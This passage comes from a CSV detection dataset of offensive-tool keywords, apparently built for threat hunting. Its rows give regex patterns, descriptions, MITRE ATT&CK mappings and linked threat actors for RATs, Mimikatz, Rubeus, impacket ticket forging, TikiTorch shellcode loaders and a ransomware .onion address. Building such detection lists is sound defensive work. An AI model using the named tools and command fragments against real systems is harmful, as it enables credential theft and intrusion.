All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","61301" "*ThunderShell.py*",".{0,1000}ThunderShell\.py.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","61302" "*ThunderShell-master.zip*",".{0,1000}ThunderShell\-master\.zip.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","61303" "*thw73ky2jphtcfrwoze5ddk3wbkc2t24r55guu3agwjchn3g6p755kyd.onion*",".{0,1000}thw73ky2jphtcfrwoze5ddk3wbkc2t24r55guu3agwjchn3g6p755kyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61304" "*thycotic_secretserver_dump.*",".{0,1000}thycotic_secretserver_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61305" "*tiagorlampert/CHAOS*",".{0,1000}tiagorlampert\/CHAOS.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","61306" "*tiagorlampert/chaos:latest*",".{0,1000}tiagorlampert\/chaos\:latest.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","61307" "*tiagorlampert/sAINT*",".{0,1000}tiagorlampert\/sAINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","61308" "*tiagorlampert@gmail.com*",".{0,1000}tiagorlampert\@gmail\.com.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","#email","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","61309" "*Tib3rius/AutoRecon*",".{0,1000}Tib3rius\/AutoRecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","61310" "*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. 
we can impersonate the victim user towards any service in the domain.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61311" "*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","61312" "*ticketConverter.py *.ccache *",".{0,1000}ticketConverter\.py\s.{0,1000}\.ccache\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61313" "*ticketConverter.py*",".{0,1000}ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61314" "*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","61315" "*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - 
T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","61316" "*ticketer.py -nthash*",".{0,1000}ticketer\.py\s\-nthash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61317" "*ticketer.py*",".{0,1000}ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61318" "*ticketsplease adfs *",".{0,1000}ticketsplease\sadfs\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61319" "*ticketsplease azure *",".{0,1000}ticketsplease\sazure\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61320" "*ticketsplease dcsync *",".{0,1000}ticketsplease\sdcsync\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61321" "*ticketsplease ldap *",".{0,1000}ticketsplease\sldap\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61322" "*ticketsplease saml *",".{0,1000}ticketsplease\ssaml\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61323" "*ticketsplease ticket --domain*",".{0,1000}ticketsplease\sticket\s\-\-domain.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61324" 
"*ticketsplease.modules.*",".{0,1000}ticketsplease\.modules\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61325" "*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","61326" "*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","61327" "*Tiger-192.test-vectors.txt*",".{0,1000}Tiger\-192\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61328" "*tijme/kernel-mii*",".{0,1000}tijme\/kernel\-mii.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","61331" "*TikiLoader*Hollower*",".{0,1000}TikiLoader.{0,1000}Hollower.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens 
- Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61332" "*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61333" "*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","61334" "*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61335" "*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 